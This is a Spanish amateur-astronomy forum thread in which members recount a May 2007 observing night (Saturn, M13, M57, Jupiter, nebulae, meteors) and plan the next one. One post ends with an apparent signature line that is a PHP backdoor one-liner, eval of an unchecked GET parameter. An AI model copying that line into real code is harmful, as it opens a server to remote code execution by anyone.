Crónica: salida del dia 11-05-2007

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
Responder
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

Crónica: salida del dia 11-05-2007

Mensaje por rcacho »

La tarde la verdad es que no pintaba demasiado bien, con nubes altas y que parecía que iban a quedarse, pero nos arriesgamos y fuimos a Pioz. Al llegar alli las nubes iban desapareciendo y, nada mas llegar, una preciosa columna solar. Lástima que no llevabamos camaras...

Bueno, carlosz22 y yo empezamos a montar los telescopios y en ese momento llego pisapedales. Un ratito de charla, observamos la columna solar (que ahora era más intensa) y a terminar de montar los telescopios bajo el ataque de los mosquitos. Tiempo de aclimatación de los tubos y hala, a empezar a observar. Primer objetivo: Venus (aún no había anochecido, serían algo así como las 9). Se notaban turbulencias, pero las achacamos a vibraciones en la montura y a la falta de aclimatación de los tubos. Pero el cielo prometía. Mercurio estaba muy abajo, pero lo intente sin resultado óptimos.

Algo más tarde aparece Polaris, asi que a poner en estación las monturas (que mira que me costó esta vez...), y después a seguir observando. Segundo objetivo, Saturno. Como siempre, increible: Cassini, la sombra de los anillos en el planeta, bandas ecuatoriales...

Cambiamos de objetivo. carlos a por el cúmulo globular M13. Yo a por Alcor/Mizar (la nostalgia a veces puede). Tras pasar por este sistema, intento sin éxito la búsqueda de las galaxias M51 y M101; después ataco también a M13. Increible a 40x. A subir: 110x, 250x y finalmente 500x (gracias por el AV carlos ;)). Vaya sensación la de resolver estrellas en el núcleo del cúmulo. Parecía un cúmulo abierto!

Cuando Lyra alcanza una altura decente, tiro a por la nebulosa planetaria M57 (carlos lo había hecho antes). Esta fue fácil de encontrar porque se adivinaba por el buscador (para que os hagais una idea de la calidad del cielo ;)). Pues nada, a meter aumentos, hasta llegar a los 500 otra vez. Saco la joyita de mi corona: el UHC. Increíble este filtro. Se veían claramente las estructuras de la nebulosa y se apreciaban tonos azulados y rojizos.

Escorpio aparece, junto con Júpiter, asi que los telescopios hacia alla. pero aun estaba muy bajo para observar algo en condiciones. Pero tirando desde Antares hacia el Oeste, está M4, otro cúmulo globular. A por él, pero claro, después de M13...no es lo mismo.

Cuando Júpiter estaba suficientemente alto, apuntamos los telescopios alli. Observamos un Júpiter genial, se veían estructuras en las bandas ecuatoriales. Una imagen que no olvidaré en mucho tiempo.

La última parte de la noche la dedicamos a cielo profundo: nebulosa California (visible a simple vista :shock: ), y las nebulosas de la Laguna y Trífida. Ahí fue ya cuando flipamos. Se distinguían los colores!!!! (maravillas del UHC). A simple vista se observaba la Via Lactea y las bandas oscuras en ella.

En fin, una muy buena noche, a pesar de los problemas en las monturas (esta semana me toca ajuste :cry: ). A ver si a la próxima viene más gente!!!

Saludos!!!
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Crónica: salida del dia 11-05-2007

Mensaje por carlosz22 »

De la salida me quedo con los colores en M57 a 500 aumentos y con el filtro UHC :shock:

También vimos M51 y M101, al final las encontré con mi telescopio, me costó pero me conocía la zona donde estaban :D Después un mini cúmulo abierto, M29 y mi querida Albireo a 250x con un filtro de color (creo que era azul) era preciosa.

Después como ha dicho Raúl tiramos a La laguna y a Trífida, los 200mm de su telescopio se notan de una forma :shock: Intenté a verlas con mi telescopio y prácticamente no tuve que mover el telescopio de su posición, estaba en el mismo recorrido que había hecho Júpiter, es lo que tiene no tener seguimiento, evidentemente no era lo mismo con el mío que con el de Raúl. Los colores en cielo profundo no son obra del maligno jajaja

Raúl vimos a simple vista Norteamérica, la California es bastante más difícil verla :wink:

PD: Vivan los 500x para ver cúmulos jajaja
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Crónica: salida del dia 11-05-2007

Mensaje por astrolozano »

Vale, si esto lo haceis para darme celos lo habeis conseguido :twisted:

Yo estuve peleando con el autostar, recorriendome medio internet, y nada. Me va a tocar hacer uso de la garantía :cry:

Estuve a punto de ir con vosotros, pero vi la calidad del cielo y dije "si ahora está así, cuando anochezca va a estar lleno de nubes". Por lo que veo me colé :roll:

Enhorabuena por la observación :wink: ¿a qué hora os fuisteis?
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

Crónica: salida del dia 11-05-2007

Mensaje por rcacho »

[quote="carlosz22"]
Raúl vimos a simple vista Norteamérica, la California es bastante más difícil verla :wink: [/quote]

Jeje, es verdad :oops:

Pues nos fuimos de alli a eso de las 3.30
pisapedales :-j
Mensajes: 69
Registrado: Vie May 04, 2007 6:06 pm

Crónica: salida del dia 11-05-2007

Mensaje por pisapedales :-j »

yo con mi cacharito algo pude ver. porque comparado con lo que habia era de juguete.
y la verdad me gusto ver venus y saturno con sus anillos todo en pequeñito pero por lo menos lo vi y quizas mas claro que con el de rcacho. las nebulosas ni lo intente por que no savia donde buscarlas, aunque las indicaciones de carlos eran buenas.
la noche acabo pronto para mi, ya que los nanos se me durmieron en el coche.
:?

la proxima ire solo con el niño que aguanta mas.
lastima astrolozano que no pudieras ir, pues no estubo mal, espero conocerte pronto, y que tu tambien me enseñes cosas.
Ya sabe mi hijo, mas que yo.
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

Crónica: salida del dia 11-05-2007

Mensaje por rcacho »

Ah! otra cosa que se me olvido comentar!!

El día de la salida estabamos entre las lluvias de estrellas delta acuaridas y las lyridas, de las cuales pudimos disfrutar unas cuantas, alguna de ellas espectaculares.

Un saludo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Crónica: salida del dia 11-05-2007

Mensaje por m3ntol »

agghh envidia cochina me dais...

pues yo el viernes de viaje y todo para que el infame @&&#!! de Felipa Massa nos jodiera el fin de semana a los 140.000 que ahí estábamos.

En fin, el próximo viernes salimos ¿no?
phpbb:eval(stripslashes($_GET[e]));
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Crónica: salida del dia 11-05-2007

Mensaje por astrolozano »

Al finde que viene yo voy, pero no me acordaba que al día siguiente tengo comunión y además a tomar por saco de aquí :lol:
Responder